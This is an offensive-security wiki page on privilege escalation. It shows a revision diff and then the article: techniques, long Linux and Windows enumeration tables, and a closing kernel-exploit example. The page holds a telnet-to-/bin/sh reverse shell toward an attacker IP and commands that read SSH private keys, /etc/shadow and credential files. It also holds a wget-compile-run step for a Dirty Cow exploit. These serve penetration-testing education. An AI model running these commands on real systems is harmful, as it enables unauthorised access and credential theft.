Privilege Escalation: Difference between revisions

From HackOps
Jump to navigation Jump to search
← Older editNewer edit →
VisualWikitext
Line 149: Line 149:
|| Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
|| Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
|-
|-
| Service config files || <code>cat /etc/syslog.conf # Syslog daemon configuration
|-
cat /etc/chttp.conf # Tiny HTTP server config
| Service config files || <code>cat /etc/syslog.conf # Syslog daemon configuration</code>
cat /etc/lighttpd.conf # Lighttpd server config
<code>cat /etc/chttp.conf # Tiny HTTP server config</code>
cat /etc/cups/cupsd.conf # Printing service config
<code>cat /etc/lighttpd.conf # Lighttpd server config</code>
cat /etc/inetd.conf # Legacy super-server config
<code>cat /etc/cups/cupsd.conf # Printing service config</code>
cat /etc/apache2/apache2.conf # Apache main config (Debian-based)
<code>cat /etc/inetd.conf # Legacy super-server config</code>
cat /etc/my.conf # MySQL config file
<code>cat /etc/apache2/apache2.conf # Apache main config (Debian-based)</code>
cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)
<code>cat /etc/my.conf # MySQL config file</code>
cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config
<code>cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)</code>
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code>
<code>cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config</code>
<code>ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code>
|| Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
|| Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
|-
|-
| Scheduled jobs || <code>crontab -l # List current user's cron jobs
| Scheduled jobs || <code>crontab -l # List current user's cron jobs</code>
ls -alh /var/spool/cron # View cron job files for users
<code>ls -alh /var/spool/cron # View cron job files for users</code>
ls -al /etc/ | grep cron # Search for cron-related files
<code>ls -al /etc/ | grep cron # Search for cron-related files</code>
ls -al /etc/cron* # List contents of cron directories
<code>ls -al /etc/cron* # List contents of cron directories</code>
cat /etc/cron* # Print content of all cron config files
<code>cat /etc/cron* # Print content of all cron config files</code>
cat /etc/at.allow # Users allowed to use 'at'
<code>cat /etc/at.allow # Users allowed to use 'at'</code>
cat /etc/at.deny # Users denied from using 'at'
<code>cat /etc/at.deny # Users denied from using 'at'</code>
cat /etc/cron.allow # Users allowed to use cron
<code>cat /etc/cron.allow # Users allowed to use cron</code>
cat /etc/cron.deny # Users denied from using cron
<code>cat /etc/cron.deny # Users denied from using cron</code>
cat /etc/crontab # System-wide cron job definitions
<code>cat /etc/crontab # System-wide cron job definitions</code>
cat /etc/anacrontab # anacron job scheduler config
<code>cat /etc/anacrontab # anacron job scheduler config</code>
cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code>
<code>cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code>
|| Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
|| Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
|-
|-
| Plaintext credentials || <code>grep -i user [filename] # Search for 'user' (case-insensitive)
| Plaintext credentials || <code>grep -i user [filename] # Search for 'user' (case-insensitive)</code>
grep -i pass [filename] # Search for 'pass' (case-insensitive)
<code>grep -i pass [filename] # Search for 'pass' (case-insensitive)</code>
grep -C 5 "password" [filename] # Show context around 'password'
<code>grep -C 5 "password" [filename] # Show context around 'password'</code>
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)</code>
<code>find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)</code>
|| These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.
|| These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.
|-
| Network interfaces || <code>/sbin/ifconfig -a # Show all network interfaces and their status</code>
<code>cat /etc/network/interfaces # Network config (Debian-based)</code>
<code>cat /etc/sysconfig/network # Network config (RHEL-based)</code>
|| Identifies available network interfaces and reveals if the system is connected to other networks — useful for lateral movement or pivoting.
|-
| Network configuration || <code>cat /etc/resolv.conf # Shows DNS servers</code>
<code>cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based)</code>
<code>cat /etc/networks # Legacy network name mappings</code>
<code>iptables -L # Lists firewall rules</code>
<code>hostname # Shows system hostname</code>
<code>dnsdomainname # Shows domain part of system's FQDN</code>
|| Helps reveal DNS, gateway, and firewall configuration — can indicate internal network structure and potential egress routes.
|-
| Active connections & services || <code>lsof -i # Lists open network connections</code>
<code>lsof -i :80 # Check if web service is active</code>
<code>grep 80 /etc/services # Maps port 80 to service name</code>
<code>netstat -antup # Shows all TCP/UDP connections with PID</code>
<code>netstat -antpx # Same with extended process info</code>
<code>netstat -tulpn # All listening services with PID</code>
<code>chkconfig --list # Lists services and runlevels</code>
<code>chkconfig --list | grep 3:on # Services started in runlevel 3</code>
<code>last # Login history of users</code>
<code>w # Who is currently logged in</code>
|| Reveals running services, user activity, and possible internal communication — useful for identifying targets or attack surfaces.
|-
| Cached network data || <code>arp -e # ARP table (IP ↔ MAC mappings)</code>
<code>route # Kernel routing table</code>
<code>/sbin/route -nee # Detailed routing info with interface names</code>
|| Displays cached IP and MAC addresses and routing paths — may expose other systems on the network or paths for movement.
|-
| Shell access & interaction || <code>nc -lvp 4444 # Attacker. Input (Commands)</code>
<code>nc -lvp 4445 # Attacker. Output (Results)</code>
<code>telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!</code>
|| Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration.
|-
| Tunneling & redirection || <code>ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling</code>
<code>proxychains ifconfig # Test command routing through proxy</code>
|| Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling.
|-
| User identity & privilege || <code>id # Show current user ID and group</code>
<code>who # List currently logged-in users</code>
<code>w # Show who is logged in and what they are doing</code>
<code>last # List recent user logins</code>
<code>cat /etc/passwd | cut -d: -f1 # List of system users</code>
<code>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts</code>
<code>awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts</code>
<code>cat /etc/sudoers # View sudo privileges</code>
<code>sudo -l # List current user's sudo rights</code>
|| Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system.
|-
| Sensitive files || <code>cat /etc/passwd # User account information</code>
<code>cat /etc/group # Group definitions</code>
<code>cat /etc/shadow # Encrypted passwords (requires root)</code>
<code>ls -alh /var/mail/ # User mailboxes, may contain sensitive data</code>
|| These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation.
|-
| Home directory inspection || <code>ls -ahlR /root/ # Recursively list all files in root's home directory</code>
<code>ls -ahlR /home/ # Recursively list all user home directories</code>
|| May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext.
|-
| Password storage in known files || <code>cat /var/apache2/config.inc # May contain hardcoded database credentials</code>
<code>cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data</code>
<code>cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext</code>
|| These locations may store sensitive data such as database passwords or install-time credentials.
|-
| User activity & command history || <code>cat ~/.bash_history # Shell command history</code>
<code>cat ~/.nano_history # Nano editor history</code>
<code>cat ~/.atftp_history # atftp client history</code>
<code>cat ~/.mysql_history # MySQL client history</code>
<code>cat ~/.php_history # PHP interactive shell history</code>
|| Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user.
|-
| Local user information || <code>cat ~/.bashrc # User shell configuration</code>
<code>cat ~/.profile # User environment profile</code>
<code>cat /var/mail/root # Root user's email inbox</code>
<code>cat /var/spool/mail/root # Another root mail location</code>
|| These files may reveal environmental setups, messages with credentials, or scripts executed at login.
|-
| SSH key & config files || <code>cat ~/.ssh/authorized_keys # Allowed public keys for login</code>
<code>cat ~/.ssh/identity.pub # Public key used for SSH auth</code>
<code>cat ~/.ssh/identity # Private key (sensitive)</code>
<code>cat ~/.ssh/id_rsa.pub # RSA public key</code>
<code>cat ~/.ssh/id_rsa # RSA private key</code>
<code>cat ~/.ssh/id_dsa.pub # DSA public key</code>
<code>cat ~/.ssh/id_dsa # DSA private key</code>
<code>cat /etc/ssh/ssh_config # SSH client configuration</code>
<code>cat /etc/ssh/sshd_config # SSH daemon configuration</code>
<code>cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key</code>
<code>cat /etc/ssh/ssh_host_dsa_key # Host DSA private key</code>
<code>cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key</code>
<code>cat /etc/ssh/ssh_host_rsa_key # Host RSA private key</code>
<code>cat /etc/ssh/ssh_host_key.pub # Legacy host public key</code>
<code>cat /etc/ssh/ssh_host_key # Legacy host private key</code>
|| These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access.
|-
| Writable config files in /etc/ || <code>ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # World-writable files in /etc/</code>
<code>ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner-writable files</code>
<code>ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group-writable files</code>
<code>ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other-writable files</code>
<code>find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/</code>
<code>find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Readable top-level files only</code>
|| Writable configuration files may allow privilege escalation by altering service behavior or execution paths.
|-
| Contents of /var/ || <code>ls -alh /var/log # Logs from services and the system</code>
<code>ls -alh /var/mail # Mailboxes for users</code>
<code>ls -alh /var/spool # Scheduled tasks, print queues, and mail spools</code>
<code>ls -alh /var/spool/lpd # Line printer daemon data</code>
<code>ls -alh /var/lib/pgsql # PostgreSQL data directory</code>
<code>ls -alh /var/lib/mysql # MySQL database directory</code>
<code>cat /var/lib/dhcp3/dhclient.leases # DHCP lease information</code>
|| These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials.
|-
| Web directories and config files || <code>ls -alhR /var/www/ # Default web root on many systems</code>
<code>ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root</code>
<code>ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root</code>
<code>ls -alhR /opt/lampp/htdocs/ # XAMPP web root</code>
<code>ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)</code>
|| Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications.
|-
| Log file inspection || <code>cat /etc/httpd/logs/access_log # Apache access log</code>
<code>cat /etc/httpd/logs/access.log # Apache access log alt path</code>
<code>cat /etc/httpd/logs/error_log # Apache error log</code>
<code>cat /etc/httpd/logs/error.log # Apache error log alt path</code>
<code>cat /var/log/apache2/access_log # Apache2 access log</code>
<code>cat /var/log/apache2/access.log # Apache2 access log alt path</code>
<code>cat /var/log/apache2/error_log # Apache2 error log</code>
<code>cat /var/log/apache2/error.log # Apache2 error log alt path</code>
<code>cat /var/log/apache/access_log # Apache access log (alt)</code>
<code>cat /var/log/apache/access.log # Apache access log (alt)</code>
<code>cat /var/log/auth.log # Authentication events</code>
<code>cat /var/log/chttp.log # cHTTP log</code>
<code>cat /var/log/cups/error_log # Printer service log</code>
<code>cat /var/log/dpkg.log # Package installation log (Debian)</code>
<code>cat /var/log/faillog # Failed login attempts</code>
<code>cat /var/log/httpd/access_log # Apache access log</code>
<code>cat /var/log/httpd/access.log # Apache access log</code>
<code>cat /var/log/httpd/error_log # Apache error log</code>
<code>cat /var/log/httpd/error.log # Apache error log</code>
<code>cat /var/log/lastlog # Last login of all users</code>
<code>cat /var/log/lighttpd/access.log # Lighttpd access log</code>
<code>cat /var/log/lighttpd/error.log # Lighttpd error log</code>
<code>cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log</code>
<code>cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log</code>
<code>cat /var/log/messages # General system messages</code>
<code>cat /var/log/secure # Security/authentication log</code>
<code>cat /var/log/syslog # System log (Ubuntu, Debian)</code>
<code>cat /var/log/wtmp # Login history (binary format)</code>
<code>cat /var/log/xferlog # FTP file transfer log</code>
<code>cat /var/log/yum.log # YUM package manager log</code>
<code>cat /var/run/utmp # Current logins (binary format)</code>
<code>cat /var/webmin/miniserv.log # Webmin log</code>
<code>cat /var/www/logs/access_log # Apache access log (within web root)</code>
<code>cat /var/www/logs/access.log # Apache access log (within web root)</code>
<code>ls -alh /var/lib/dhcp3/ # DHCP lease and config files</code>
<code>ls -alh /var/log/postgresql/ # PostgreSQL logs</code>
<code>ls -alh /var/log/proftpd/ # FTP server logs</code>
<code>ls -alh /var/log/samba/ # SMB service logs</code>
|| Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation.


|}
|}

Revision as of 18:42, 30 May 2025

Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.

Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).

Privilege escalation is rarely a one-step action — it follows a structured process:

  • Collect – Perform thorough enumeration across the system.
  • Process – Organize and analyze the data to identify promising leads.
  • Search – Identify known vulnerabilities and locate suitable exploit code.
  • Adapt – Customize the exploit to match the specific environment.
  • Try – Execute and iterate; exploitation often requires trial and error.


Operational Context

Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.

This phase is crucial for:

  • Achieving administrative control (root, SYSTEM)
  • Enabling credential extraction and lateral movement
  • Bypassing sandboxed or containerized environments
  • Establishing persistence mechanisms (e.g., registry, startup tasks)

Vertical Privilege Escalation

Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).

Common Techniques

  • Exploiting kernel or driver vulnerabilities
  • Abusing misconfigured SUID/SGID binaries (Linux)
  • Misusing weak or world-writable service files
  • Leveraging unquoted service paths (Windows)
  • DLL hijacking or service misconfiguration
  • Stealing credentials from memory or config files
  • Abusing scheduled tasks or cron jobs
  • Exploiting insecure file permissions or ownership
  • Leveraging token impersonation or privilege tokens (Windows)
  • Dumping and cracking password hashes
  • Abusing Linux capabilities (e.g., cap_sys_admin)
  • Escaping weakly isolated Docker or LXC containers
  • Exploiting insecure ACLs or lack of integrity controls

Tools

Automated Exploitation Frameworks

Horizontal Privilege Escalation

Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.

Common Techniques

  • Reading other users’ sensitive files due to improper permissions
  • Accessing SSH keys, config files, or tokens
  • Hijacking user sessions (e.g., TTY snooping or credential reuse)
  • Exploiting insecure file-sharing configurations (e.g., SMB shares)
  • Abuse of API tokens or database credentials found in cleartext

Tools

Enumeration Checklists

Linux Enumeration Commands

Purpose Command Potential Use in Privilege Escalation
SUID/SGID binaries find / -perm -4000 2>/dev/null May reveal misconfigured binaries that can be exploited for privilege escalation.
Kernel version uname -a Identifying vulnerable kernel versions that have known local privilege escalation exploits.
Environment variables env May expose sensitive paths or misconfigured variables usable in custom script execution.
Running processes ps aux Reveals running services or scripts running as root; useful for process injection or misconfigurations.
Installed packages (Debian) dpkg -l Can identify vulnerable software versions or unintended package installs.
Installed packages (Red Hat) rpm -qa Same as above, but for RPM-based systems.
Writable directories find / -writable 2>/dev/null Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
Cron jobs cat /etc/crontab Look for jobs running as root or referencing writable scripts.
User info cat /etc/passwd Useful for identifying users, shell access, and potential privilege chaining.
Group info cat /etc/group Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
OS version info (Generic) cat /etc/issue Helps fingerprint system for targeted exploits.
OS version info (All common release files) cat /etc/*-release Same purpose — confirms distro and version for exploit matching.
OS version (Debian based) cat /etc/lsb-release Specifically useful for identifying Ubuntu/Debian versions.
OS version (Red Hat based) cat /etc/redhat-release Same, but for RHEL/CentOS systems.
Kernel version & architecture cat /proc/version # Shows detailed kernel version and build info

uname -a # Displays all system info including kernel name and architecture
uname -mrs # Prints kernel name, version, and hardware name
rpm -q kernel # Lists installed kernel packages (RPM-based systems)
dmesg | grep Linux # Extracts kernel-related boot messages
ls /boot | grep vmlinuz- # Lists available kernel images in /boot

Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.
Environment configuration files cat /etc/profile # System-wide environment variables

cat /etc/bashrc # System-wide bash shell settings
cat ~/.bash_profile # User-specific environment variables
cat ~/.bashrc # User-specific bash shell settings
cat ~/.bash_logout # Commands run at logout
env # Print current environment variables

Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation.
Printer services lpstat -a # Lists printers and their status May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured.
Running services & privileges ps aux # Lists all running processes with associated users

ps -ef # Alternative view of all processes with full format
top # Dynamic real-time process list
cat /etc/services # Maps known services to their ports

Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons.
Root-owned services grep root # Filters running processes owned by root

ps -ef | grep root # Alternate full-format view of root-owned processes

Useful for spotting services running as root that may be vulnerable or misconfigured — valuable targets for privilege escalation.
Installed applications & versions ls -alh /usr/bin/ # Lists applications and binaries in user path

ls -alh /sbin/ # Lists system binaries
dpkg -l # Lists installed packages (Debian-based systems) rpm -qa # Lists installed packages (RPM-based systems) ls -alh /var/cache/apt/archives # Shows downloaded .deb packages ls -alh /var/cache/yum/ # Shows cached .rpm packages

Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
Service config files cat /etc/syslog.conf # Syslog daemon configuration

cat /etc/chttp.conf # Tiny HTTP server config cat /etc/lighttpd.conf # Lighttpd server config cat /etc/cups/cupsd.conf # Printing service config cat /etc/inetd.conf # Legacy super-server config cat /etc/apache2/apache2.conf # Apache main config (Debian-based) cat /etc/my.conf # MySQL config file cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based) cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)

Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
Scheduled jobs crontab -l # List current user's cron jobs

ls -alh /var/spool/cron # View cron job files for users ls -al /etc/ | grep cron # Search for cron-related files ls -al /etc/cron* # List contents of cron directories cat /etc/cron* # Print content of all cron config files cat /etc/at.allow # Users allowed to use 'at' cat /etc/at.deny # Users denied from using 'at' cat /etc/cron.allow # Users allowed to use cron cat /etc/cron.deny # Users denied from using cron cat /etc/crontab # System-wide cron job definitions cat /etc/anacrontab # anacron job scheduler config cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs

Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
Plaintext credentials grep -i user [filename] # Search for 'user' (case-insensitive)

grep -i pass [filename] # Search for 'pass' (case-insensitive) grep -C 5 "password" [filename] # Show context around 'password' find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)

These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.
Network interfaces /sbin/ifconfig -a # Show all network interfaces and their status

cat /etc/network/interfaces # Network config (Debian-based) cat /etc/sysconfig/network # Network config (RHEL-based)

Identifies available network interfaces and reveals if the system is connected to other networks — useful for lateral movement or pivoting.
Network configuration cat /etc/resolv.conf # Shows DNS servers

cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based) cat /etc/networks # Legacy network name mappings iptables -L # Lists firewall rules hostname # Shows system hostname dnsdomainname # Shows domain part of system's FQDN

Helps reveal DNS, gateway, and firewall configuration — can indicate internal network structure and potential egress routes.
Active connections & services lsof -i # Lists open network connections

lsof -i :80 # Check if web service is active grep 80 /etc/services # Maps port 80 to service name netstat -antup # Shows all TCP/UDP connections with PID netstat -antpx # Same with extended process info netstat -tulpn # All listening services with PID chkconfig --list # Lists services and runlevels chkconfig --list | grep 3:on # Services started in runlevel 3 last # Login history of users w # Who is currently logged in

Reveals running services, user activity, and possible internal communication — useful for identifying targets or attack surfaces.
Cached network data arp -e # ARP table (IP ↔ MAC mappings)

route # Kernel routing table /sbin/route -nee # Detailed routing info with interface names

Displays cached IP and MAC addresses and routing paths — may expose other systems on the network or paths for movement.
Shell access & interaction nc -lvp 4444 # Attacker. Input (Commands)

nc -lvp 4445 # Attacker. Output (Results) telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!

Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration.
Tunneling & redirection ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling

proxychains ifconfig # Test command routing through proxy

Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling.
User identity & privilege id # Show current user ID and group

who # List currently logged-in users w # Show who is logged in and what they are doing last # List recent user logins cat /etc/passwd | cut -d: -f1 # List of system users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts cat /etc/sudoers # View sudo privileges sudo -l # List current user's sudo rights

Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system.
Sensitive files cat /etc/passwd # User account information

cat /etc/group # Group definitions cat /etc/shadow # Encrypted passwords (requires root) ls -alh /var/mail/ # User mailboxes, may contain sensitive data

These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation.
Home directory inspection ls -ahlR /root/ # Recursively list all files in root's home directory

ls -ahlR /home/ # Recursively list all user home directories

May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext.
Password storage in known files cat /var/apache2/config.inc # May contain hardcoded database credentials

cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext

These locations may store sensitive data such as database passwords or install-time credentials.
User activity & command history cat ~/.bash_history # Shell command history

cat ~/.nano_history # Nano editor history cat ~/.atftp_history # atftp client history cat ~/.mysql_history # MySQL client history cat ~/.php_history # PHP interactive shell history

Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user.
Local user information cat ~/.bashrc # User shell configuration

cat ~/.profile # User environment profile cat /var/mail/root # Root user's email inbox cat /var/spool/mail/root # Another root mail location

These files may reveal environmental setups, messages with credentials, or scripts executed at login.
SSH key & config files cat ~/.ssh/authorized_keys # Allowed public keys for login

cat ~/.ssh/identity.pub # Public key used for SSH auth cat ~/.ssh/identity # Private key (sensitive) cat ~/.ssh/id_rsa.pub # RSA public key cat ~/.ssh/id_rsa # RSA private key cat ~/.ssh/id_dsa.pub # DSA public key cat ~/.ssh/id_dsa # DSA private key cat /etc/ssh/ssh_config # SSH client configuration cat /etc/ssh/sshd_config # SSH daemon configuration cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key cat /etc/ssh/ssh_host_dsa_key # Host DSA private key cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key cat /etc/ssh/ssh_host_rsa_key # Host RSA private key cat /etc/ssh/ssh_host_key.pub # Legacy host public key cat /etc/ssh/ssh_host_key # Legacy host private key

These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access.
Writable config files in /etc/ awk '$1 ~ /^.*w.*/' 2>/dev/null # World-writable files in /etc/

ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner-writable files ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group-writable files ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other-writable files find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/ find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Readable top-level files only

Writable configuration files may allow privilege escalation by altering service behavior or execution paths.
Contents of /var/ ls -alh /var/log # Logs from services and the system

ls -alh /var/mail # Mailboxes for users ls -alh /var/spool # Scheduled tasks, print queues, and mail spools ls -alh /var/spool/lpd # Line printer daemon data ls -alh /var/lib/pgsql # PostgreSQL data directory ls -alh /var/lib/mysql # MySQL database directory cat /var/lib/dhcp3/dhclient.leases # DHCP lease information

These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials.
Web directories and config files ls -alhR /var/www/ # Default web root on many systems

ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root ls -alhR /opt/lampp/htdocs/ # XAMPP web root ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)

Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications.
Log file inspection cat /etc/httpd/logs/access_log # Apache access log

cat /etc/httpd/logs/access.log # Apache access log alt path cat /etc/httpd/logs/error_log # Apache error log cat /etc/httpd/logs/error.log # Apache error log alt path cat /var/log/apache2/access_log # Apache2 access log cat /var/log/apache2/access.log # Apache2 access log alt path cat /var/log/apache2/error_log # Apache2 error log cat /var/log/apache2/error.log # Apache2 error log alt path cat /var/log/apache/access_log # Apache access log (alt) cat /var/log/apache/access.log # Apache access log (alt) cat /var/log/auth.log # Authentication events cat /var/log/chttp.log # cHTTP log cat /var/log/cups/error_log # Printer service log cat /var/log/dpkg.log # Package installation log (Debian) cat /var/log/faillog # Failed login attempts cat /var/log/httpd/access_log # Apache access log cat /var/log/httpd/access.log # Apache access log cat /var/log/httpd/error_log # Apache error log cat /var/log/httpd/error.log # Apache error log cat /var/log/lastlog # Last login of all users cat /var/log/lighttpd/access.log # Lighttpd access log cat /var/log/lighttpd/error.log # Lighttpd error log cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log cat /var/log/messages # General system messages cat /var/log/secure # Security/authentication log cat /var/log/syslog # System log (Ubuntu, Debian) cat /var/log/wtmp # Login history (binary format) cat /var/log/xferlog # FTP file transfer log cat /var/log/yum.log # YUM package manager log cat /var/run/utmp # Current logins (binary format) cat /var/webmin/miniserv.log # Webmin log cat /var/www/logs/access_log # Apache access log (within web root) cat /var/www/logs/access.log # Apache access log (within web root) ls -alh /var/lib/dhcp3/ # DHCP lease and config files ls -alh /var/log/postgresql/ # PostgreSQL logs ls -alh /var/log/proftpd/ # FTP server logs ls -alh /var/log/samba/ # SMB service logs

Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation.


Windows Enumeration Commands

Purpose Command
Whoami and privileges whoami /priv
Local groups net localgroup administrators
Services (CMD) sc query
Services (PowerShell) Get-Service
Startup registry keys reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks schtasks /query
Installed programs wmic product get name
Environment variables set
File permissions (CMD) icacls
File permissions (Sysinternals) accesschk

Example: Local Kernel Exploit (Linux)

# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit

# Output: spawns root shell if successful

Websites & References

See Also

Retrieved from "https://hackops.wiki/index.php?title=Privilege_Escalation&oldid=160"